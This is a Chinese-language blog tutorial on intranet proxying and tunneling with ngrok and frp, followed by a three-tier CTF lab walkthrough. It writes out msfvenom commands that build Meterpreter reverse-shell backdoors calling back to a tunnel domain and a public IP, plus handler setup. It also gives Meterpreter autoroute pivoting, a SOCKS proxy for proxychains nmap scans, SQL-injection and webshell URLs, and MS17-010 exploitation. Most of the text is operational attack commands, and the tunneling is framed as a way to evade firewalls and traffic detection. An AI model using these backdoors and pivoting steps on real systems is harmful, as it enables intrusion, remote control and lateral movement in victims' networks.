1.內網安全代理技術
阿新 • • 發佈:2021-12-20
0x01.基礎知識
1.內外網簡單知識
常見的內網地址:
10.x.x.x
172.16.x.x---172.31.x.x
192.168.x.x
2.內網 1 和內網 2 通訊問題
老王的個人電腦 (連線自己家wifi)
老李的個人電腦 (連線自己家wifi)
這個時候通過代理 , 讓兩個電腦的連線
3.正向反向協議通訊連線問題
正向 : 對方有一個唯一的公網地址 , 你能夠找到他
反向 : 對方只要能夠出網 , 然後你有一個公網地址 , 他能找到你
4.內網穿透代理隧道技術說明
代理 : 解決的是網路通訊問題 隧道 : 解決的是流量分析工具 , 流量檢測工具 , 和防火牆相關過濾問題 兩個功能是不一樣的
0x02.內網穿透Ngrok
測試演示-兩個內網通訊上線
實驗環境:兩個不同的內網(有網路)實現穿透控制
1.註冊-購買-填寫-確認 http://www.ngrok.cc/
協議:http 本地埠:127.0.0.1:80
下載客戶端
記住你的隧道域名後面會用到 http://xxxxxxxxxxxx 和 隧道id xxsjdbswqdwe11324nsj
2.測試:內網 1 執行後門-免費主機處理-內網 2 監聽-內網 2 接受器 ./sunny clientid aa0676878c162ffc 3.msf生成後門 msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.76.132 set lport 4444 exploit
簡單理解 : 你可以理解成在兩個電腦之間搞了中介 , 中介負責傳遞你們之間傳遞的資料
0x03.內網穿透 Frp
自行搭建,方便修改,成本低,使用多樣化,適合高富帥及隱私哥哥們
1.服務端-下載-解壓-修改-啟動(阿里雲主機記得修改安全組配置出入口) 伺服器修改配置檔案 frps.ini: [common] bind_port = 6677 啟動服務端: ./frps -c ./frps.ini 2.控制端-下載-解壓-修改-啟動 控制端修改配置檔案 frpc.ini: [common] server_addr = 你的雲主機 ip server_port = 6677 #frpc 工作埠,必須和上面 frps 保持一致 [msf] type = tcp local_ip = 127.0.0.1 local_port = 5555 #轉發給本機的 5555 remote_port = 6000 #服務端用 6000 埠轉發給本機 啟動客戶端: ./frpc -c ./frpc.ini
msf生成後門測試
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211 lport=6000 -f exe -o mm.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit
3.靶機執行 mm.exe 即可
0x04.CFS三層內網漫遊安全測試演練
來源 2019 某 CTF 線下賽真題內網結合 WEB 攻防題庫,涉及 WEB 攻擊,內網代理路由等技術,每臺
伺服器存在一個 Flag,獲取每一個 Flag 對應一個積分,獲取三個 Flag 結尾。
別被嚇到了 , 實際上很簡單 , 就是通過1攻擊2, 2再攻擊3
1.Target1
探針目標-利用 WEB 漏洞(TP5_RCE)-獲取 webshell 許可權-獲取 Flag-Target2
1.生成後門:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t1.elf
2.接受反彈:
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.76.132
set LPORT 1111
exploit
3.資訊收集及配置訪問
獲取網路介面:run get_local_subnets # 返回當前機器的所有網絡卡
檢視路由地址:run autoroute -p
新增路由地址:run autoroute -s 192.168.22.0/24 # 目標的網段 , 這樣就可以和22段通訊了 , 但是當前只有msf會話可以訪問
開啟本地代理:
use auxiliary/server/socks4a
set srvport 2222
exploit
4.利用本地代理介面訪問測試
設定瀏覽器代理進行訪問測試
linux:
配置 proxychains 後呼叫工具探針 Target2
/etc/proxychains.conf
socks4 192.168.76.132 2222
proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80
-Pn:掃描主機檢測其是否受到資料包過濾軟體或防火牆的保護。
-sT:掃描 TCP 資料包已建立的連線 connect
windows:
利用代理工具 Proxifier 或 SocksCap64 載入代理進行程序訪問測試
2.Target2
探針目標-利用 WEB 漏洞(SQL 注入)-後臺獲取 webshell 許可權-獲取 Flag-Target3
http://192.168.22.128/index.php?r=vul&keyword=1 #sql 注入
http://192.168.22.128/index.php?r=admini/public/login #後臺
http://192.168.22.128/index.php?r=special #後門 shell
1.生成正向後門:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
2.訪問接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit
受害主機執行t2.elf就可以拿到會話了
3.資訊收集及配置訪問
獲取網路介面:run get_local_subnets
檢視路由地址:run autoroute -p
新增路由地址:run autoroute -s 192.168.33.0/24
3.Target3
traget3上面有ms-17-010漏洞 , 但是你要設定payload為正向連線 , 設定RHOST為目標主機地址 , 因為他不能反向連線你然後 run 就可以拿到會話了